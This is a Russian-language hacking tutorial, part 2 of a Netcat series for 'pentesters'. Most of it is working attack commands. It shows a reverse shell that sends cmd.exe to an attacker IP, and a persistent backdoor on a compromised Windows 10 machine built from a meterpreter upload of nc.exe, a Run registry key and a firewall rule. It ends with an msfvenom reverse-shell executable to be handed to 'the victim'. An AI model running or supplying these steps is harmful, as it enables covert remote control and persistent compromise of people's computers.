Возможности Netcat глазами пентестера. Часть 2

Возможности Netcat глазами пентестера. Часть 2

Life-Hack [Жизнь-Взлом]/Хакинг

#Обучение

Есть некая вероятность, что пользователь не сможет выбрать собственный порт для установки листенера или получить соединение netcat. Однако у netcat есть специальный флаг «r», который предоставит человеку рандомизированный локальный порт.

nc -lv –r

На приведенном ниже изображении можно увидеть, что листенер был запущен (38931).

Захват HTTP-баннера

HTTP-баннеры теперь могут быть извлечены только с трудом, так как они содержат информацию о сервере. Однако пользователь может использовать netcat для сбора информации о любом веб-сервере.

Ему нужно просто выполнить следующую команду, чтобы манипулировать сервером цели и проверить, что он захватил.

printf "GET / HTTP/1.0\r\n\r\n" | nc 192.168.1.105 80

Отлично!! На приведенном ниже изображении можно увидеть, что пользователь успешно захватил HTTP-баннер, и был задействован сервер Apache.

Windows Reverse Connection

Бэкдор системы приветствует пользователя каждый раз, когда включается защита.

Таким образом, пользователь попытается создать такой же бэкдор для Windows, который позволит войти в нее в любое время, когда он захочет.

Сперва необходимо установить листенер на kali.

nc –lvp 4444

Теперь выполнить следующую команду в командной строке Windows жертвы, чтобы создать бэкдор.

nc.exe 192.168.1.109 4444 -e cmd.exe

Пора возвращаться к машине нападающего. На приведенном ниже изображении можно увидеть, что человек находится в командном shell жертвы.

Персистентность Windows 10

Персистентность играет важную роль в жизни хакера. Итак, стоит попробовать создать постоянный бэкдор с помощью Netcat и Metasploit Framework на машине, которая была скомпрометирована.

На приведенном ниже изображении можно увидеть, что пользователь захватил сеанс meterpreter машины Windows 10.

Теперь он загрузит netcat.exe файл в system32 на компьютере жертвы с помощью следующей команды:

upload /usr/share/windows-binaries/nc.exe C:\\windows\\system32

После этого он настроит netcat на листенер в любом случайном порту, скажем 4445, откроет порт при запуске и установит соединение.

Надо использовать следующую команду:

reg setval -k HKLM\\software\\microsoft\\windows\\currentversion\\run -v netcat -d 'C:\windows\system32\nc.exe -Ldp 4445 -e cmd.exe'

При успешном подключении Netcat пользователь получит reverse_shell компьютера жертвы.

Теперь пришло время добавить новое правило к брандмауэру с именем «netcat», в котором входящее соединение будет позволять использовать порт 4445 с помощью интерактивной командной строки cmd, выполняющей команду под названием netsh.

Пользователь вводит следующую команду:

netsh advfirewall firewall add rule name='netcat' dir=in action=allow protocol=Tcp localport=4445

Пора проверить рабочий режим и состояние порта, выполнив следующую команду:

netsh firewall show portopening

Так что со всем этим покончено. Теперь, когда жертва перезагружает систему снова, пользователь вновь получит shell. Надо выполнить следующую команду, чтобы подключить бэкдор netcat по порту 4445.

nc -nv 192.168.1.105 4445

Отлично!! Пользователь успешно сохранил постоянный бэкдор, теперь всякий раз, когда жертва загружает систему, у него всегда будет установлен с ней сеанс.

Полезная нагрузка Msfvenom с помощью Netcat

До сих пор читатель изучал все о Netcat: от его основных функций до продвинутых возможностей. Итак, пора узнать, как пользователь может связаться с жертвой через Netcat_shell, используя полезную нагрузку msfvenom.

Следует запустить терминал и выполнить следующую команду для генерации файла .exe полезной нагрузки.

msfvenom -p windows/shell_reverse_tcp lhost=192.168.1.104 lport=3333 –f exe > shell.exe

Теперь стоит запустить листенер Netcat по порту 3333.

Пользователь поделится этой сгенерированной полезной нагрузкой с жертвой, как только он/она откроет ее, он получит обратное соединение.

Источник


Report Page